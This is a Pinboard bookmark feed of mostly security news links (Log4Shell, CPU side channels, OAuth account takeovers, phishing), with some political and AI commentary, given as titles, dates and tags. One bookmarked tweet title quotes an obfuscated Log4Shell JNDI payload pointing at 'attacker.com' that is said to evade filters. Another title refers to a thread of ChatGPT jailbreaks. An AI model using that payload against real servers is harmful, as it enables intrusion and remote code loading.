Pinboard (coslinks)
https://pinboard.in/u:coslinks/public/
recent bookmarks from coslinksThe ‘Do Nothing’ Strategy - by Dan Rather and Team Steady2024-02-06T17:33:40+00:00
https://steady.substack.com/p/the-do-nothing-strategy
coslinkssubstack steady danrather border security legislation funding senate republicans politics mexico mikejohnson stevescalise elisestefanik jameslankford joebidenhttps://pinboard.in/https://pinboard.in/u:coslinks/b:08ba40b62288/Malware abuses Google OAuth endpoint to ‘revive’ cookies, hijack accounts2023-12-31T20:06:59+00:00
https://www.bleepingcomputer.com/news/security/malware-abuses-google-oauth-endpoint-to-revive-cookies-hijack-accounts/
coslinksgoogle web oauth cookies vulnerability malware bleepingcomputer billtoulas security multilogin cloudsek prisma googlechrome gaia pavankarthick lemmastealer stealc risepro whitesnake hudsonrockhttps://pinboard.in/https://pinboard.in/u:coslinks/b:8bc9bba5d5d0/DEF CON 29 - James Kettle - HTTP2: The Sequel is Always Worse - YouTube2023-12-27T18:17:47+00:00
https://www.youtube.com/watch?v=rHxVVeM9R-M
coslinksyoutube video defcon presentation web security http http2 requestsmuggling jameskettle defconconference vulnerability loadbalancers geek sysadmin httpdesync albinowax portswiggerhttps://pinboard.in/https://pinboard.in/u:coslinks/b:73bf27632452/How worried should we be about the “AutoSpill” credential leak in Android password managers? | Ars Technica2023-12-14T16:57:08+00:00
https://arstechnica.com/security/2023/12/how-worried-should-we-be-about-the-autospill-credential-leak-in-android-password-managers/
coslinksarstechnica android security passwordmanager webview google autospill vulnerability alesandroortiz oauth 1password stevewon lastpass alexcox dashlanehttps://pinboard.in/https://pinboard.in/u:coslinks/b:809cac9c053e/Podcast Episode Rerelease: Securing the Vote | Electronic Frontier Foundation2023-12-07T01:42:29+00:00
https://www.eff.org/deeplinks/2023/08/podcast-episode-rerelease-securing-vote
coslinksdannyobrien pamsmith verifiedvoting cindycohn eff podcast voting internet security privacy elections trust democracy computershttps://pinboard.in/https://pinboard.in/u:coslinks/b:d57e912cc487/Just about every Windows and Linux device vulnerable to new LogoFAIL firmware attack | Ars Technica2023-12-06T23:41:57+00:00
https://arstechnica.com/security/2023/12/just-about-every-windows-and-linux-device-vulnerable-to-new-logofail-firmware-attack/
coslinksarstechnica logofail UEFI security fuzzing boot secureboot computers binarly alexmatrosov malware blacklotus dell intelbootguard lojaxhttps://pinboard.in/https://pinboard.in/u:coslinks/b:6e8ab20e24e7/Superintelligence: The Idea That Eats Smart People2023-11-26T20:12:28+00:00
https://idlewords.com/talks/superintelligence.htm
coslinksmaciejceglowski ai talk webcampzagreb chainreaction atomicbomb hyperintelligence elonmusk stephenhawking billgates rogerpenrose brain cognition nickbostrom eliezeryudkowsky intelligence mooreslaw scottalexander emuwar australia security values tonyrobbins motivation joiito medialab technology religion siliconvalley machinelearning raykurzweil google samaltman rationalist stanislawlem communism scifi stanleykubrik alchemyhttps://pinboard.in/https://pinboard.in/u:coslinks/b:f4c41ab328f2/Maciej Ceglowski - Superintelligence: The Idea That Eats Smart People (Keynote) - YouTube2023-11-26T19:19:11+00:00
https://www.youtube.com/watch?v=kErHiET5YPw
coslinksyoutube video maciejceglowski ai talk webcampzagreb chainreaction atomicbomb hyperintelligence elonmusk stephenhawking billgates rogerpenrose brain cognition nickbostrom eliezeryudkowsky intelligence mooreslaw scottalexander emuwar australia security values tonyrobbins motivation joiito medialab technology religion siliconvalley machinelearning raykurzweil google samaltman rationalist stanislawlem communism scifi stanleykubrik alchemyhttps://pinboard.in/https://pinboard.in/u:coslinks/b:88ca4bf2d983/P0 Security | Detect transitive access to sensitive Google Cloud resources2023-11-21T16:25:42+00:00
https://p0.dev/blog/transitive-access-gcp
coslinksp0security gcp google cloud iam security serviceaccounthttps://pinboard.in/https://pinboard.in/u:coslinks/b:9ae9f7240235/In a first, cryptographic keys protecting SSH connections stolen in new attack | Ars Technica2023-11-15T19:14:36+00:00
https://arstechnica.com/security/2023/11/hackers-can-steal-ssh-cryptographic-keys-in-new-cutting-edge-attack/
coslinksarstechnica ssh vulnerability diffiehelman rsa errors tls ipsec security dangoodin cryptography mathhttps://pinboard.in/https://pinboard.in/u:coslinks/b:2228aea540ec/Incomplete disclosures by Apple and Google create “huge blindspot” for 0-day hunters | Ars Technica2023-11-01T22:08:21+00:00
https://arstechnica.com/security/2023/09/incomplete-disclosures-by-apple-and-google-create-huge-blindspot-for-0-day-hunters/
coslinksarstechnica libwebp apple google vulnerability disclosure chrome imageio citizenlab software security electron rezillionhttps://pinboard.in/https://pinboard.in/u:coslinks/b:01aaa0c74482/'Log in with...' Feature Allows Full Online Account Takeover for Millions2023-10-26T20:22:58+00:00
https://www.darkreading.com/remote-workforce/oauth-log-in-full-account-takeover-millions
coslinksdarkreading oauth authentication security tech elizabethmontalbano saltlabs booking.com expo vidio grammarly bukalapak yanivbalmashttps://pinboard.in/https://pinboard.in/u:coslinks/b:7f0fa8f55a06/Alisdair Calder McGregor: "This is both hilarious and evi…" - Top Spicy Crew2023-10-26T15:07:46+00:00
https://topspicy.social/@A_C_McGregor/111289530935229231
coslinkstopspicy.social mastodon goatse iframe web security game ads sqword @a_c_mcgregorhttps://pinboard.in/https://pinboard.in/u:coslinks/b:5f40628d6e5b/1Password is the latest victim of Okta’s compromise • The Register2023-10-24T18:25:36+00:00
https://www.theregister.com/2023/10/24/1password_confirms_all_logins_are/
coslinkstheregister okta 1password har web security breach cloudflare beyondtrusthttps://pinboard.in/https://pinboard.in/u:coslinks/b:79aa29dcd978/How it works: The novel HTTP/2 ‘Rapid Reset’ DDoS attack | Google Cloud Blog2023-10-21T18:00:23+00:00
https://cloud.google.com/blog/products/identity-security/how-it-works-the-novel-http2-rapid-reset-ddos-attack
coslinksgoogle cloud http abuse DDoS mitigation http2 http3 network security tcp/ip networkinghttps://pinboard.in/https://pinboard.in/u:coslinks/b:b6dcb9b34529/Hamas’s attack shows Benjamin Netanyahu failed Israel - Vox2023-10-21T14:23:53+00:00
https://www.vox.com/23910085/netanyahu-israel-right-hamas-gaza-war-history
coslinksvox politics strategy israel palestine bibinetanyahu gaza hamas zackbeauchamp washpost nogatarnopolsky shirarubin westbank haaretz talschneider timesofisrael failure bezalelsmotrich terrorism settlements settlers palestinians idf 2017 extremists judiciary fatah annexation secondintifada security massacre peaceprocesshttps://pinboard.in/https://pinboard.in/u:coslinks/b:f106670a4c90/Opinion | The Hamas horror is also a lesson on the price of populism - The Washington Post2023-10-18T21:36:42+00:00
https://www.washingtonpost.com/opinions/2023/10/11/netanyahu-populism-weakened-israeli-security/
coslinkswashpost opinion yuvalnoahharari israel hamas massacre kfraaza beeri bibinetanyahu democracy populism security 1973 yomkippurwar war holocaust einsatzgruppen oslo peace government jewshttps://pinboard.in/https://pinboard.in/u:coslinks/b:b47a6a2fd662/Hotel hackers redirect guests to fake Booking.com to steal cards2023-10-16T19:56:06+00:00
https://www.bleepingcomputer.com/news/security/hotel-hackers-redirect-guests-to-fake-bookingcom-to-steal-cards/
coslinksbleepingcomputer hackers phishing hotels booking.com security malware shiranguez akamaihttps://pinboard.in/https://pinboard.in/u:coslinks/b:ba58063ac52f/Settlers Are Trying to Drag Israel Into War in the West Bank - Haaretz Editorial - Haaretz.com2023-10-16T14:23:12+00:00
https://www.haaretz.com/opinion/editorial/2023-10-15/ty-article-opinion/.premium/settlers-are-trying-to-drag-israel-into-war-in-the-west-bank/0000018b-2fda-d450-a3af-6fdebe030000
coslinkshaaretz editorlial israel settlers security gaza idf killing whatsapp altuwani btselem danielhagari bibinetanyahuhttps://pinboard.in/https://pinboard.in/u:coslinks/b:2abf8c00c02f/How I made a heap overflow in curl | daniel.haxx.se2023-10-11T15:24:27+00:00
https://daniel.haxx.se/blog/2023/10/11/how-i-made-a-heap-overflow-in-curl/
coslinkscurl bug security socks5 proxy bufferoverflow c cybersecurity programming danielstenberghttps://pinboard.in/https://pinboard.in/u:coslinks/b:8dd887693880/GPUs from all major suppliers are vulnerable to new pixel-stealing attack | Ars Technica2023-09-29T23:33:39+00:00
https://arstechnica.com/security/2023/09/gpus-from-all-major-suppliers-are-vulnerable-to-new-pixel-stealing-attack/
coslinkspixelstealing gpu security vulnerability arstechnica iframe web yingchenwang utaustin chrome edge sidechannelhttps://pinboard.in/https://pinboard.in/u:coslinks/b:4b27a7bd3bd4/38TB of data accidentally exposed by Microsoft AI researchers | Wiz Blog2023-09-19T15:20:59+00:00
https://www.wiz.io/blog/38-terabytes-of-private-data-accidentally-exposed-by-microsoft-ai-researchers
coslinkswiz blog cloud security SAS tokens microsoft azure breach privacy analysis AI githubhttps://pinboard.in/https://pinboard.in/u:coslinks/b:e5b52f3445e3/Zenbleed2023-08-04T11:45:56+00:00
https://lock.cmpxchg8b.com/zenbleed.html
coslinkszenbleed vulnerability amd processor x86_64 cpu registers fuzzing security tavisormandy google cmpxchg8bhttps://pinboard.in/https://pinboard.in/u:coslinks/b:9d38ce8c423d/AMD ‘Zenbleed’ bug can be exploited to leak passwords from Ryzen CPUs - The Verge2023-08-02T18:04:16+00:00
https://www.theverge.com/2023/7/25/23806705/amd-ryzen-cpu-processor-zenbleed-vulnerability-exploit-bug
coslinkstheverge zenbleed amd security vulnerability cpu google projectzero tavisormandyhttps://pinboard.in/https://pinboard.in/u:coslinks/b:8ac5eb834cfd/Video-Based Cryptanalysis2023-07-12T13:01:47+00:00
https://www.nassiben.com/video-based-crypta
coslinksnassiben security video power led cryptanalysis bennassi cybersecurity etayiluz ofekvayner orcohen cornell bengurionu ecdsahttps://pinboard.in/https://pinboard.in/u:coslinks/b:e0ed36dfd016/Analysis: Can Islamic Jihad survive Israel’s assassination drive? | Israel-Palestine conflict News | Al Jazeera2023-07-07T21:21:48+00:00
https://www.aljazeera.com/news/2023/7/7/analysis-can-islamic-jihad-survive-israels-assassination-drive
coslinksaljazeera israel palestine gaza hamas hezbollah islamicjihad assassination attacks jenin securityhttps://pinboard.in/https://pinboard.in/u:coslinks/b:8bc1522fa195/How one of Vladimir Putin’s most prized hacking units got pwned by the FBI | Ars Technica2023-05-12T22:44:25+00:00
https://arstechnica.com/information-technology/2023/05/how-the-fbi-pwned-turla-a-kremlin-jewel-and-one-of-worlds-most-skilled-apts/
coslinkscomputer security encryption fbi nsa hackers russia snake turla counterintelligence arstechnicahttps://pinboard.in/https://pinboard.in/u:coslinks/b:0ebc96b731b2/Kelly Shortridge: "Imagining an attack operation …" - Hachyderm.io2023-03-29T15:16:04+00:00
https://hachyderm.io/@shortridge/110103715391811257
coslinkshacyderm @shortridge kellyshortridge security cybersecurity funny build pipeline geekhttps://pinboard.in/https://pinboard.in/u:coslinks/b:0145087dbc12/My Channel Was Deleted Last Night - YouTube2023-03-25T12:25:54+00:00
https://www.youtube.com/watch?v=yGXaAWbzl5A
coslinksyoutube video linustechtips security google 2fa tesla cryptocurrency scam sessiontoken browser malwarehttps://pinboard.in/https://pinboard.in/u:coslinks/b:9428e065253e/CircleCI incident report for January 4, 2023 security incident2023-03-23T17:03:56+00:00
https://circleci.com/blog/jan-4-2023-incident-report/
coslinkscircleci postmortem security incidenthttps://pinboard.in/https://pinboard.in/u:coslinks/b:b7a9d248db65/Zack Witten on Twitter: "Thread of known ChatGPT jailbreaks. 1. Pretending to be evil https://t.co/qQlE5ycSWm" / Twitter2023-03-18T13:55:48+00:00
https://twitter.com/zswitten/status/1598380220943593472
coslinkstwitter @zswitten chatgpt ai hacks jailbreaks technology security threadhttps://pinboard.in/https://pinboard.in/u:coslinks/b:c3082cdd1bd3/Facial Recognition Is Tech's Biggest Mistake | PCMag2023-01-26T15:45:16+00:00
https://www.pcmag.com/opinions/facial-recognition-is-techs-biggest-mistake
coslinkspcmag maxeddy security privacy biometrics police china surveillance apple google faceid fingerprint technology cellphone intenthttps://pinboard.in/https://pinboard.in/u:coslinks/b:d84519ed411d/Making Bitwarden Backups -- One Approach : Bitwarden2022-12-31T22:30:41+00:00
https://www.reddit.com/r/Bitwarden/comments/y6d588/making_bitwarden_backups_one_approach/
coslinksreddit /r/bitwarden bitwarden backups security passwords veracrypt /u/djasonpenneyhttps://pinboard.in/https://pinboard.in/u:coslinks/b:934575c6882f/Jeremi M Gosney :verified:: "I recently wrote a post detail…" - Infosec Exchange2022-12-27T15:55:33+00:00
https://infosec.exchange/@epixoip/109585049354200263
coslinksinfosec.exchange @epixoip jeremigosney security encryption software lastpass 1password bitwarden breachhttps://pinboard.in/https://pinboard.in/u:coslinks/b:946913880874/Password requirements: myths and madness2022-12-27T15:26:00+00:00
https://www.franzoni.eu/password-requirements-myths-madness/
coslinksfranzoni alanfranzoni passwords xkcd security policies characters unicode DoS webhttps://pinboard.in/https://pinboard.in/u:coslinks/b:4eaf1a60b143/Jeremi M Gosney "Many of you have been asking for my thoughts on the #LastPass breach" - Infosec Exchange2022-12-25T14:39:13+00:00
https://infosec.exchange/@epixoip/109570449317277575
coslinksmastodon infosec.exchange @epixoip lastpass security encryption passwords breach aes256 pbkdf2https://pinboard.in/https://pinboard.in/u:coslinks/b:5a65eda6c8ea/"All right. You've covered your ass now." | MetaFilter2022-12-02T22:00:33+00:00
https://www.metafilter.com/197396/All-right-Youve-covered-your-ass-now
coslinksmetafilter georgewbush 9/11 2004 alqaeda security politics government georgetenet 9/11commissionhttps://pinboard.in/https://pinboard.in/u:coslinks/b:0084a7545341/Sam Curry on Twitter: "More car hacking! Earlier this year, we were able to remotely unlock, start, locate, flash, and honk any remotely connected Honda, Nissan, Infiniti, and Acura vehicles, completely unauthorized, knowing only the VIN number of the car2022-12-02T14:46:14+00:00
https://twitter.com/samwcyo/status/1597792097175674880
coslinkstwitter thread @samwcyo samcurry cars security telematics siriusxm nissan nissanconnect hackhttps://pinboard.in/https://pinboard.in/u:coslinks/b:c3e878a34574/Stealing passwords from infosec Mastodon - without bypassing CSP | PortSwigger Research2022-11-18T23:20:12+00:00
https://portswigger.net/research/stealing-passwords-from-infosec-mastodon-without-bypassing-csp
coslinkssecurity web html injection portswigger hacking garethheyes mastodonhttps://pinboard.in/https://pinboard.in/u:coslinks/b:da030f4630a7/Dan Trombly on Twitter: "A breach of a Prime Minister's phone by hostile intelligence services is a huge information security concern. Consequently, security experts recommend changing your Prime Minister every 6 weeks to limit your vulnerability to these2022-11-01T01:17:24+00:00
https://twitter.com/stcolumbia/status/1586392561731928064
coslinkstwitter @stcolumbia snark geek security liztruss cellphone espionage dantromblyhttps://pinboard.in/https://pinboard.in/u:coslinks/b:23857acc6e7a/Behold, a password phishing site that can trick even savvy users | Ars Technica2022-10-25T20:38:24+00:00
https://arstechnica.com/information-technology/2022/03/behold-a-password-phishing-site-that-can-trick-even-savvy-users/
coslinksarstechnica security phishing oauth spoofing browser bitb mr.d0xhttps://pinboard.in/https://pinboard.in/u:coslinks/b:1592c6d4c699/Pluralistic: 20 Oct 2022 It was all downhill after the Cuecat – Pluralistic: Daily links from Cory Doctorow2022-10-22T13:06:55+00:00
https://pluralistic.net/2022/10/20/benevolent-dictators/
coslinkssoftware technology gadgets corydoctorow cuecat copyright walledgarden business law competition facebook apple google appstore apps pierrephilippecoupard michaelrothwell digitalconvergence shannonvallor wilwheaton donaldnorman usability design book DMCA onlyfans securityhttps://pinboard.in/https://pinboard.in/u:coslinks/b:ac8e76a7661f/Why npm lockfiles can be a security blindspot for injecting malicious modules | Snyk2022-10-11T15:25:37+00:00
https://snyk.io/blog/why-npm-lockfiles-can-be-a-security-blindspot-for-injecting-malicious-modules/
coslinkssnyk software development npm lockfiles security lockfile-linthttps://pinboard.in/https://pinboard.in/u:coslinks/b:0b2c62b7bfca/Say Hello to Crazy Thin ‘Deep Insert’ ATM Skimmers – Krebs on Security2022-09-16T20:41:12+00:00
https://krebsonsecurity.com/2022/09/say-hello-to-crazy-thin-deep-insert-atm-skimmers/
coslinkskrebsonsecurity atm skimmers security theft banking ncrhttps://pinboard.in/https://pinboard.in/u:coslinks/b:fe7beec43f8b/I'm Adam Shostack, ask me anything : privacy2022-09-10T04:24:13+00:00
https://www.reddit.com/r/privacy/comments/xaaw3x/im_adam_shostack_ask_me_anything/
coslinksreddit /r/privacy tech computers security privacy adamshostackhttps://pinboard.in/https://pinboard.in/u:coslinks/b:6fe9e35ad324/This weekend, I watched a hacker jailbreak a John Deere tractor live on stage | by Cory Doctorow | Aug, 2022 | Medium2022-08-25T23:56:27+00:00
https://doctorow.medium.com/this-weekend-i-watched-a-hacker-jailbreak-a-john-deere-tractor-live-on-stage-febbb0dc5a76
coslinkscorydoctorow johndeere copyright software security righttorepair sickcodes tractors ukraine russia defcon kylewiens ifixit @kwiens wired lilyhaynewman wince linux hack opensourcehttps://pinboard.in/https://pinboard.in/u:coslinks/b:9a30a78cdb35/Software dev cracks Hyundai encryption with Google search • The Register2022-08-22T14:54:50+00:00
https://www.theregister.com/2022/08/17/software_developer_cracks_hyundai_encryption/
coslinkshyandai car software security encryption wtf google hyandaimobis greenluigi1 example keyhttps://pinboard.in/https://pinboard.in/u:coslinks/b:8e5f91061681/Janet Jackson music video given CVE for crashing laptops • The Register2022-08-19T22:12:22+00:00
https://www.theregister.com/2022/08/18/janet_jackson_video_crashes_laptops/
coslinkstheregister cve computers security funny janetjackson music harddrives mitre raymondchen microsoft laptopshttps://pinboard.in/https://pinboard.in/u:coslinks/b:9ea892d2e778/Microsoft Employees Exposed Own Company’s Internal Logins2022-08-17T17:55:12+00:00
https://www.vice.com/en/article/m7gb43/microsoft-employees-exposed-login-credentials-azure-github
coslinksvice microsoft security github azure credentials spidersilk mossabhussein motherboardhttps://pinboard.in/https://pinboard.in/u:coslinks/b:24230aaaa004/“PACMAN” Hack Breaks Apple M1’s Last Line of Defense - IEEE Spectrum2022-06-29T21:04:32+00:00
https://spectrum.ieee.org/pacman-hack-can-break-apple-m1s-last-line-of-defense
coslinksieee spectrum apple m1 cpu security pacman pointers speculativeexecution mit mengjiayan spectre meltdownhttps://pinboard.in/https://pinboard.in/u:coslinks/b:136d4ca0e8f0/I got hacked by an iPhone Cable. - YouTube2022-05-24T22:02:43+00:00
https://www.youtube.com/watch?v=IrXLRxSsMbs
coslinksyoutube security usb computing hackers omg video mrwhosethebosshttps://pinboard.in/https://pinboard.in/u:coslinks/b:9384734e8534/How we found vulnerabilities in GitHub Actions CI/CD pipelines - Cycode2022-05-04T17:53:16+00:00
https://cycode.com/blog/github-actions-vulnerabilities/
coslinkscycode github githubactions cicd security sysadminhttps://pinboard.in/https://pinboard.in/u:coslinks/b:7834fc63557f/CVE-2022-21449: Psychic Signatures in Java – Neil Madden2022-04-21T01:20:14+00:00
https://neilmadden.blog/2022/04/19/psychic-signatures-in-java/
coslinksoracle java security ellipticcurve neilmadden c++ crypto doctorwho ecdsa eddsa wycheproof software vulnerabilityhttps://pinboard.in/https://pinboard.in/u:coslinks/b:fa061dd5b78d/AWS RDS Vulnerability Leads to AWS Internal Service Credentials2022-04-12T15:17:16+00:00
https://blog.lightspin.io/aws-rds-critical-security-vulnerability
coslinkslightspin blog aws rds postgres security hack gafnitamigahttps://pinboard.in/https://pinboard.in/u:coslinks/b:57de0cd078ba/Lupinia Studios - I'm a Scam Prevention Expert, and I Got Scammed2022-04-01T15:05:30+00:00
http://www.lupinia.net/writing/tech/scammed.htm
coslinkslupinia infosec scam wellsfargo applepay socialengineering analysis natashalupinia fraud securityhttps://pinboard.in/https://pinboard.in/u:coslinks/b:3f7b8d1cb1b7/Corey Quinn on Twitter: "So I've been a *mostly* happy @Ubiquiti customer, despite a few hiccups with their Cloud Key Gen 2+ model space heater. And a security breach. That I first found out about from @briankrebs. Against whom Ubiquiti has apparently jus2022-03-30T20:08:43+00:00
https://twitter.com/quinnypig/status/1508965090019577856
coslinkstwitter ubiquiti @ubiquiti coreyquinn @quinnypig security nicksharp briankrebs krebsonsecurity lawsuit threadhttps://pinboard.in/https://pinboard.in/u:coslinks/b:28539b731ecc/Cloudflare’s investigation of the January 2022 Okta compromise2022-03-22T22:14:29+00:00
https://blog.cloudflare.com/cloudflare-investigation-of-the-january-2022-okta-compromise/
coslinkscloudflare okta hack investigation blog johngrahamcumming security computershttps://pinboard.in/https://pinboard.in/u:coslinks/b:3d655874b741/Browser In The Browser (BITB) Attack | mr.d0x2022-03-17T18:32:10+00:00
https://mrd0x.com/browser-in-the-browser-phishing-attack/
coslinksphishing web security javascript css deception mrd0x browsershttps://pinboard.in/https://pinboard.in/u:coslinks/b:0f0c5d418822/Social Media Posts Misrepresent U.S.-Ukraine Threat Reduction Program - FactCheck.org2022-03-12T01:05:17+00:00
https://www.factcheck.org/2022/03/social-media-posts-misrepresent-u-s-ukraine-threat-reduction-program/
coslinksfactcheck usa ukraine labs security biolabs kyivpost 1994 russia propaganda 2005 publichealth research georgia andrewweber disinformationhttps://pinboard.in/https://pinboard.in/u:coslinks/b:0341ef679dd8/Telegram Harm Reduction for Users in Russia and Ukraine | Electronic Frontier Foundation2022-03-05T20:46:29+00:00
https://www.eff.org/deeplinks/2022/03/telegram-harm-reduction-users-russia-and-ukraine
coslinkseff ukraine russia security privacy communication messaging apps telegram signal whatsapp encryptionhttps://pinboard.in/https://pinboard.in/u:coslinks/b:66399ccf0b25/Adam Kay on Twitter: "A quick thread on in the importance of being careful what data you share - even if you're the Queen. Today, Her Maj tweeted this lovely picture, gor bless er, etc. You might think that the contents of the red box would be official bu2022-02-07T13:34:29+00:00
https://twitter.com/amateuradam/status/1490394034900197388
coslinksadamkay twitter thread intelligence queenelizabeth rickroll @amateuradam photo securityhttps://pinboard.in/https://pinboard.in/u:coslinks/b:37ef8306ef16/Log libraries and the tendency to open holes in things2021-12-30T18:04:42+00:00
http://rachelbythebay.com/w/2021/12/18/log/
coslinksrachelbythebay programming security GLOG GFLAGS c++ logging emailhttps://pinboard.in/https://pinboard.in/u:coslinks/b:e20c05d38cea/Occupy Babel!2021-12-17T02:50:05+00:00
http://langsec.org/occupy/
coslinkslangsec computer security languages api protocol programminghttps://pinboard.in/https://pinboard.in/u:coslinks/b:8acf524a5a83/Tinker on Twitter: "Alright, I'm officially over #Log4J. Not saying anything in my org is patched. Just saying I'm done worrying about it & am moving on w/my life. Y'all need to stop living in fear. Just accept that exploits happen & if it's your company'2021-12-16T15:10:49+00:00
https://twitter.com/TinkerSec/status/1471128734010945542
coslinkssnark satire antivax log4shell security pandemic twitter @tinkersec log4jhttps://pinboard.in/https://pinboard.in/u:coslinks/b:4fd79cfde319/GitHub - Cybereason/Logout4Shell: Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell2021-12-14T22:07:21+00:00
https://github.com/Cybereason/Logout4Shell
coslinkslog4shell logout4shell java log4j vaccine security web github exploithttps://pinboard.in/https://pinboard.in/u:coslinks/b:e0a783b1c482/America's secret terrorist watchlist exposed on the web without a password: report2021-12-14T21:20:46+00:00
https://www.linkedin.com/pulse/americas-secret-terrorist-watchlist-exposed-web-report-diachenko/
coslinkslinkedin security privacy noflylist terrorism breach volodymyrdiachenko DHS CBP TSC watchlist FBIhttps://pinboard.in/https://pinboard.in/u:coslinks/b:080b076840f1/Tom Anthony on Twitter: "Interesting Log4j payload I discovered, simply omit the closing brace }, and now you will potentially get a bunch of data exfiltrated to your server until the next } appears in that data. Had it work on a FANG target... https://t.2021-12-13T20:35:50+00:00
https://twitter.com/tomanthonyseo/status/1470374984749133825?s=21
coslinkstwitter log4j log4shell security web tomanthony @tomanthonyseohttps://pinboard.in/https://pinboard.in/u:coslinks/b:c7ab8a11a16d/BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-12 2204 UTC · GitHub2021-12-13T20:34:53+00:00
https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592
coslinksjava log4j log4shell security github reference swithakhttps://pinboard.in/https://pinboard.in/u:coslinks/b:fc164749a0bf/Naomi not Niomi on Twitter: "If you took a long weekend and are just finding out about #log4j, here's what you need to know as a defender 👇🏼 1. It's bad. VERY bad. The level of badness can't be overstated. Attack surface grows by the minute. Great e2021-12-13T20:33:45+00:00
https://twitter.com/ineedmorecyber/status/1470224616375439369
coslinkslog4j web internet security twitter thread @ineedmorecyber exploit log4shellhttps://pinboard.in/https://pinboard.in/u:coslinks/b:a0d64374308f/Brandon Forbes on Twitter: "If you're filtering on "ldap", "jndi", or the ${lower:x} method, I have bad news for you: ${${env:BARFOO:-j}ndi${env:BARFOO:-:}${env:BARFOO:-l}dap${env:BARFOO:-:}//attacker.com/a} This gets past every filter I've found so far.2021-12-13T01:25:03+00:00
https://twitter.com/Rezn0k/status/1469523006015750146
coslinkslog4j web security twitter @rezn0k java jndi log4shellhttps://pinboard.in/https://pinboard.in/u:coslinks/b:d55484ad607d/